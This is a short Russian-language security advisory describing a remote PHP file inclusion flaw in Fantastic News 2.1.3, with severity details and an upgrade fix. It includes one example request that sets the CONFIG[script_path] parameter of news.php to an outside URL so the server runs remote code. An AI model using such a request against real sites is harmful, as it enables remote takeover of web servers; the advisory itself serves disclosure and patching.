PHP-инклюдинг в Fantastic News

Дата публикации:
22.08.2006
Дата изменения:
17.10.2006
Всего просмотров:
1691
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Fantastic News 2.x
Уязвимые версии: Fantastic News 2.1.3, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "CONFIG[script_path]" в сценарии news.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

http://[host]/[Script Path]/news.php?CONFIG[script_path]=http://[file]

URL производителя: fscripts.com/free.php?id=1

Решение: Установите последнюю версию (2.1.4) с сайта производителя.

Ссылки: Fantastic News <= 2.1.3 (script_path) Remote File Include Vulnerability

или введите имя

CAPTCHA